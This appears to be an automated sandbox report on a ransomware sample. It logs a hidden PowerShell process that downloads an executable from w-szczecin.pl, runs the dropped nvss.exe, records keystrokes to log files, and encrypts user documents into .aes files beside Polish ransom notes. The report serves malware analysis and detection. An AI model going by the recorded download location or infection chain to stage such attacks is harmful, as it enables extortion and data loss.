| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command | os_pid = 0xa6c, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | ||
| Get Filename | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 | ||
| Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | ||
| Map | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = XABNCPUWKW |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
10 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
109 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\kFT6uTQW |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\kFT6uTQW |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\kFT6uTQW\AppData\Roaming |
|
4 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = w-szczecin.pl, address_out = 91.231.140.161, service = 0 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (75 bytes) |
| Total Data Received | 393.78 KB (403235 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 91.231.140.161:80 |
| Information | Value |
|---|---|
| Handle | 0x4ec |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 91.231.140.161 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 1984 |
| Data Sent | 0.07 KB (75 bytes) |
| Data Received | 393.78 KB (403235 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 91.231.140.161, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 75, size_out = 75 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8972 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5240 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 52272 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 14520 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65140 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 55176 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 52272 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 63888 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 25915, size_out = 5808 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 20107, size_out = 20107 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (75 bytes) |
| Total Data Received | 393.78 KB (403235 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | w-szczecin.pl |
| Information | Value |
|---|---|
| Server Name | w-szczecin.pl |
| Server Port | 80 |
| Data Sent | 0.07 KB (75 bytes) |
| Data Received | 393.78 KB (403235 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = w-szczecin.pl, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /img2/s50.exe |
|
1 | |
| Send HTTP Request | headers = host: w-szczecin.pl, connection: Keep-Alive, url = w-szczecin.pl/img2/s50.exe |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 8972 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 5240 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 23232 |
|
1 | |
| Read Response | size = 65536, size_out = 52272 |
|
1 | |
| Read Response | size = 65536, size_out = 14520 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 65140 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 55176 |
|
1 | |
| Read Response | size = 65536, size_out = 8712 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 52272 |
|
1 | |
| Read Response | size = 65536, size_out = 63888 |
|
1 | |
| Read Response | size = 25915, size_out = 5808 |
|
1 | |
| Read Response | size = 20107, size_out = 20107 |
|
1 | |
| Close Session |
|
1 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:00:55, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:40 |
| Information | Value |
|---|---|
| PID | 0xa6c |
| Parent PID | 0xa40 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A70
0x
A74
0x
A78
0x
A7C
0x
A80
0x
A84
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
9 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Write | CONOUT$ | size = 90 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 2 |
|
2 | |
| Write | CONOUT$ | size = 3472 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
18 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\kft6utqw\appdata\roaming\nvss.exe |
| Command Line | "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:37 |
| Information | Value |
|---|---|
| PID | 0xa90 |
| Parent PID | 0xa40 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A94
0x
AA0
0x
AA4
0x
AA8
0x
AB0
0x
AB4
0x
AB8
0x
ABC
0x
AC0
0x
AC4
0x
AC8
0x
ACC
0x
AD0
0x
ADC
0x
B78
0x
B7C
0x
B88
0x
B8C
0x
B90
0x
B94
0x
BA4
0x
BA8
0x
BAC
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\keyboard\17102017_012722.log | 0.04 KB (37 bytes) |
MD5:
a1fb0cacc1cee630641b508b2086b7a9
SHA1: 064cf6477e359f9084098da05bc974b1147f16f4 SHA256: 6426309787950c45434ce8d35229ff32437868cc6c437c397625061cb788ec81 |
|
|
| c:\programdata\keyboard\17102017_012722.log | 0.08 KB (85 bytes) |
MD5:
2aed3869dc90e2c688b00a7f76050ece
SHA1: 8e22e62dc5916fd9001262d356461644de9e1c48 SHA256: a25b97ccc667cf1fa3df95fd22c16f8f20c7671ef5e29ffc7424ee3f08124538 |
|
|
| c:\programdata\keyboard\17102017_012722.log | 0.48 KB (489 bytes) |
MD5:
b637d1056fb3a64637527b0de3c2722a
SHA1: 8ef4b8b0fe397f596922aae624c4c61cea02ac35 SHA256: 2cb8d99c2bf5b5b73e03e8690a5e981f547e4e1aad2aacae16f9e03124537c38 |
|
|
| c:\users\kft6utqw\appdata\local\temp\cab8999.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\appdata\local\temp\tar899a.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\appdata\local\temp\cab8a08.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\appdata\local\temp\tar8a09.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\appdata\local\temp\cab8aa6.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\appdata\local\temp\tar8aa7.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\-vero sqdwv.avi.aes | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\kft6utqw\appdata\local\temp\cab8999.tmp | 51.73 KB (52967 bytes) |
MD5:
26763abb95381e4931c194e34023c33a
SHA1: e1b8114caa3a6b173c2e04e356a5065e7b2ca968 SHA256: 49f2686e30a59fabf11db1234c377497cf09e941ff50a0346854d087e8b08587 |
|
|
| c:\users\kft6utqw\appdata\local\temp\cab8a08.tmp | 51.73 KB (52967 bytes) |
MD5:
26763abb95381e4931c194e34023c33a
SHA1: e1b8114caa3a6b173c2e04e356a5065e7b2ca968 SHA256: 49f2686e30a59fabf11db1234c377497cf09e941ff50a0346854d087e8b08587 |
|
|
| c:\users\kft6utqw\appdata\local\temp\tar899a.tmp | 123.21 KB (126167 bytes) |
MD5:
0dab7711a89d642ffe6ea216d92e56c1
SHA1: f2295d85679189d4fc1aac7c761be81447299ec5 SHA256: 163a6d7aaf9374ae4f1b4ee744a906b68da772aaa22095b4ecae709fb6d889e5 |
|
|
| c:\users\kft6utqw\appdata\local\temp\tar8a09.tmp | 123.21 KB (126167 bytes) |
MD5:
0dab7711a89d642ffe6ea216d92e56c1
SHA1: f2295d85679189d4fc1aac7c761be81447299ec5 SHA256: 163a6d7aaf9374ae4f1b4ee744a906b68da772aaa22095b4ecae709fb6d889e5 |
|
|
| c:\users\kft6utqw\appdata\local\temp\cab8aa6.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\kft6utqw\appdata\local\temp\tar8aa7.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\programdata\keyboard\17102017_012722.log | 0.53 KB (544 bytes) |
MD5:
d64d152896c18c6c805a792270a2df0f
SHA1: c859282002c93ab665ae07992074214b328caf50 SHA256: 0bda07e2a3283ef8f30d50ddd1fc99b854a1d86c497fcd2572dfb2d65b46192e |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\1bus.odt.aes | 70.85 KB (72546 bytes) |
MD5:
f2cab558712cd7186fcf61d6f3787620
SHA1: 40a933423897a3f92306a5881ac01c9181ca9afd SHA256: a3c45f43e438c138ca658fbb4e05734d8c15acce65427bec9135f091c2730593 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\#$# jak-odzyskac-pliki.txt | 2.54 KB (2604 bytes) |
MD5:
cbe0aa03a088135610ec0779aba641c5
SHA1: 9b36102fabaf1599b4f6f5f52c2645e3194aba67 SHA256: 10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\#$# jak-odzyskac-pliki.txt | 2.54 KB (2604 bytes) |
MD5:
cbe0aa03a088135610ec0779aba641c5
SHA1: 9b36102fabaf1599b4f6f5f52c2645e3194aba67 SHA256: 10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\b-s_mvdiahrja wonyd7.csv.aes | 54.47 KB (55778 bytes) |
MD5:
dbcb43a9798c0304870a937e10d2b081
SHA1: f1a7ef9a881ffa6185da630da6e884b11bbb5260 SHA256: 9f939c63edf1a9169fd470cda68210ed428d86ca83cb9037c322f93c3c53929c |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\3frpiupvjo9pxh.doc.aes | 68.28 KB (69922 bytes) |
MD5:
da8d033bbbe5b451eac7b4ac77ee0d16
SHA1: 34e0c518033bb64058b612e7ceeb20578d5ca2cd SHA256: b6182e025ca557bb2c1538d2d498ff163ec0bbca095149619f716358627077b8 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\7wldze9wqqhkod.odp.aes | 73.50 KB (75266 bytes) |
MD5:
4420d02ae796332100cb6fb22d53981e
SHA1: cc3baed9e423ca7029a69b5e05e7343f6b0fc22e SHA256: 8bab0ee1a1e2d309eaf3bf055575b00828bb0f5ebab96a0ac6ae61f7c82ef4b4 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\hvcemxs1islck.doc.aes | 48.66 KB (49826 bytes) |
MD5:
2097ab114a5b50c789d3d41038337434
SHA1: 1c42f8ae3849e66b3ac412a8dc101c63ed2459ba SHA256: c18f2f582daa67496f9d55aacf60e3edb9dc74eadb1f3875af33ced36447f206 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\pa730znol5.rtf.aes | 10.99 KB (11250 bytes) |
MD5:
58bf0255677de942755ea7b7dbcfaf10
SHA1: f60e537f2659ce20ce8b8f86092ffce3ba47bba6 SHA256: 413416e46b46964f5d0fb72b330ffc5d7ac3c49bcfa6826cc9d04e70137aab25 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\_x864g9nghehtp16yw.ods.aes | 69.83 KB (71506 bytes) |
MD5:
46f2018c9afedc0f7cd8ceddb2e00e95
SHA1: 88ebb09b8b4b916f0bd5118e7ffb84b04880953f SHA256: 2a99f7ac23b8090ab9004e5268c8381c66e4c13b8c6222260b645bb862a8e360 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\0qp cbtp2kdutxphn8y.csv.aes | 98.56 KB (100930 bytes) |
MD5:
1dd5743b7642ab3f7ebf23a2c4d11bed
SHA1: 0fa780b46783b4d6d02c2fcdcc76e380964a8072 SHA256: 48ed4ee93ac7712258e9692ffe388ffde95f41234bfbcf39de333d1478ce63fb |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\#$# jak-odzyskac-pliki.txt | 2.54 KB (2604 bytes) |
MD5:
0b5f0f80cc4b36b483bb621bb425c777
SHA1: 933d96b6b6f3953641eb927871482d46a68587b1 SHA256: e4841e111ff327774b47d7a880fc5ef644885929615b1a9b3ac325cf2ddcf0a4 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\f6p3h-e5k60slj.pdf.aes | 32.77 KB (33554 bytes) |
MD5:
f8023e58ab11fa5ef5e9f6a263d672a3
SHA1: a886ac508b0e21b56829e27c1a68504a3bc25cf5 SHA256: c32e2e5fae3a1ba9c7ac5afb2e44ee719a2a7d79a06a25206ce41997d3693e1c |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\iufdafezbb3p- l4i3e.rtf.aes | 87.08 KB (89170 bytes) |
MD5:
28ebc3a1b1fe94cc03f43f3cdd76b961
SHA1: 40915812c97a291642b009625b59bddb3c09530d SHA256: 71425428390900f936b53991578c19e2161a143028209a919e297476d51db896 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\pwqhqsjinpvfkbjkrzb.rtf.aes | 5.35 KB (5474 bytes) |
MD5:
663b3cb0a0ffde4211d6099d1d744572
SHA1: 6cdfff84c93a0cde5805a2fe81a4f27d223daba0 SHA256: 97ec7a84cbf36bc41d4a6ec973f3f76c725b5129ab814c7d93c56647b3f8739b |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\t8rijba3r5ril.pptx.aes | 33.42 KB (34226 bytes) |
MD5:
ab4d82455547a815c43ed9c055badce6
SHA1: 8bb40d5459ee9726d3728cd4c76fa35e800f5c5e SHA256: 8b3bcab35f8e11efb3807baa8785328322c03f0145f863422525df5e87ba0c76 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\0_b3ijrl61ikm2.xls.aes | 54.13 KB (55426 bytes) |
MD5:
8e4cc4c2b7762bb926abbb3007736831
SHA1: d6d246bc12fcb5e67e121caf52d07feb6cce47ec SHA256: 8228409efa8aa583936fd32c6b3137ca5e4677c4c2c0cfaadd5a8e21cc54a2f3 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\#$# jak-odzyskac-pliki.txt | 2.54 KB (2604 bytes) |
MD5:
b862b4250082ea6c4db185c4068292b4
SHA1: 3637ded2b5a9eb6beb9cf479ffe1324a240c8880 SHA256: a81c24f504e998f5a0003223d74aeb74f0a4ecf81f06e979a4b468bc2c847bfc |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\568wxqkdq_fimwon.pdf.aes | 95.31 KB (97602 bytes) |
MD5:
247b667d9fb0fc8b2eeb7f6b8dd15360
SHA1: 86aea694a1065a8a261b8b878c25bedd8c5d5cdf SHA256: c6a0aca2c5b19931f50fa52b0e3f24f854d7d5516ceac0983bb169d1de30d9bd |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\8m1fcp.ots.aes | 67.94 KB (69570 bytes) |
MD5:
c3fa5deca0032d11062c098aca043806
SHA1: f29cdcc56481817d3507edbc5a67c188074d467d SHA256: 180f9e94819f02c6b8ff6e3d093973c16cc869c8e0871a429e312a85c235aed5 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p2qhvhrc07x 6m.odt.aes | 49.85 KB (51042 bytes) |
MD5:
1c97627a6dbb86fd651e5a2ecdd1c439
SHA1: 7b682fcff36969b9c76b2b879668c588dca05da9 SHA256: 7dd3b123673fe046879e00ef60e78482ee4b53411830fe23ee03dce07644d068 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\urm66b8mfk_b.docx.aes | 54.50 KB (55810 bytes) |
MD5:
d9ea2dd5cc2040cebb83b1202a21bcc8
SHA1: d523dea27e8e78cfc129ad6e4c79f03681956d05 SHA256: b805ff00bed7062529f73f3bd639421542860dbadfcd7fd470743ffa0054f1f7 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\vfwuhdcvzf0grto.pptx.aes | 99.89 KB (102290 bytes) |
MD5:
e703703b34b46197760b09e17cf8df6a
SHA1: 78f113ba271b320ebb256029640d38633fdfa053 SHA256: 179ef98c877640d95d681751c615cfd7cc26cb6735ad9dabbe158c20ffc95082 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\wvf jpe1b.xls.aes | 59.94 KB (61378 bytes) |
MD5:
760f9fb0025e83f024a3cf667642a529
SHA1: 4b9e921ca48b9204bd2f0d15a22b77492363d379 SHA256: c7946be6a97b1d1b8136be5226cbd00c1d01543afb780a5341d07fc9eb89d5d9 |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\n1mkd81vkeia7s2.rtf.aes | 42.21 KB (43218 bytes) |
MD5:
8a8c0f566668e1b12b7fc374828700ec
SHA1: 36a31257d40b8f92f2f6cb1c3baabf73c0f2f3fe SHA256: e6b2fd1d505f8752f242990ec1d3d79eae59bd57fef2b63aada93d2c531254de |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\#$# jak-odzyskac-pliki.txt | 2.54 KB (2604 bytes) |
MD5:
f9ae75622ad7932bde701dd30af9ab14
SHA1: 27afb65304d50a280fe85b6b8986766c6adf77f2 SHA256: 866ea96120ab6a005968d8c52e61bec38d7bd6d57c5c88ce4ea616167c2322b7 |
|
|
| c:\users\kft6utqw\appdata\roaminghhfhqi2h.wln.bat | 1.61 KB (1648 bytes) |
MD5:
2cf00a0b576815e19471a6cfe7a0d898
SHA1: dee9eab29048d71fc2c04bf18edb260bf12fb84e SHA256: 1aaedbc63631dcece73558d47f1f587bf001ffd0d2bcfabd53fd220145238cbd |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\orrmspmnhogtvab.doc.aes | 61.47 KB (62946 bytes) |
MD5:
861e60657aebfcc7642f866b5a0a750a
SHA1: b75956081f84bff389f8fa4f973f4a347244584b SHA256: 2f5acaae23f5533756bebe73f7bbadbc5246b0ffe98e1116ef305d0e69e622bb |
|
|
| c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\pp5 bxjs.pptx.aes | 63.05 KB (64562 bytes) |
MD5:
